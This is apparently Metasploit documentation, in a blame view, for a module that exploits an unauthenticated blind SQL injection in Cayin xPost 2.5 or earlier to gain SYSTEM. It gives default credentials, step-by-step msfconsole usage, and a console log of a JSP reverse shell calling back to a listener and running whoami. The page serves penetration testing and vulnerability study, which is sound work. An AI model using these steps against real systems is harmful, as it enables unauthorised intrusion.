Files
metasploit-gs/documentation/modules/exploit/windows/http/cayin_xpost_sql_rce.md
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

67 lines
2.0 KiB
Markdown
Raw Normal View History

2020-06-09 13:07:00 -04:00
## Vulnerable Application
2020-06-12 10:46:44 -04:00
This module exploits an unauthenticated SQLi in Cayin xPost <=2.5.
The `wayfinder_meeting_input.jsp` file's `wayfinder_seqid` parameter can
2020-06-17 11:47:11 -04:00
be injected with a blind SQLi. Since this app bundles MySQL and Apache
2020-06-12 10:46:44 -04:00
Tomcat the environment is pretty static and therefore the default
settings should work. Results in SYSTEM level access. Only the
`java/jsp_shell_reverse_tcp` and `java/jsp_shell_bind_tcp` payloads seem
to be valid.
2020-06-09 13:07:00 -04:00
Default authentication for the system is administrator:admin from
2020-06-10 20:42:22 -04:00
[Guide](http://onlinehelp.cayintech.com/xPost/PDF/MAXP20EN110504-l.pdf) page 16
2020-06-09 13:07:00 -04:00
## Verification Steps
1. Install the application and start it
2. Start msfconsole
3. Do: ```exploit/windows/http/cayin_xpost_sql_rce```
4. Do: ```set rhosts [ip]```
5. Do: ```run```
6. You should get a shell.
## Options
### LOCALWEBROOT
Path to the `webapps` folder for Cayin. Defaults to `C:/CayinApps/webapps/`
## Scenarios
### Cayin xPost 2.5 on Windows 10.0.16299.125
```
[*] Processing xpost.rb for ERB directives.
resource (xpost.rb)> use exploit/windows/http/cayin_xpost_sql_rce
resource (xpost.rb)> set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
resource (xpost.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (xpost.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (xpost.rb)> set verbose true
verbose => true
resource (xpost.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Utilizing payload filename cY0bWf1Rh6C9.jsp
[*] Payload Size: 1499
[*] Payload Size Encoded: 2998
[*] Attempting Exploitation
[*] Triggering uploaded payload
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:50158) at 2020-06-09 12:20:33 -0400
[!] Tried to delete C:/CayinApps/webapps/cY0bWf1Rh6C9.jsp, unknown result
C:\CayinApps\Tomcat>
C:\CayinApps\Tomcat>whoami
whoami
nt authority\system
C:\CayinApps\Tomcat>ver
ver
Microsoft Windows [Version 10.0.16299.125]
C:\CayinApps\Tomcat>
```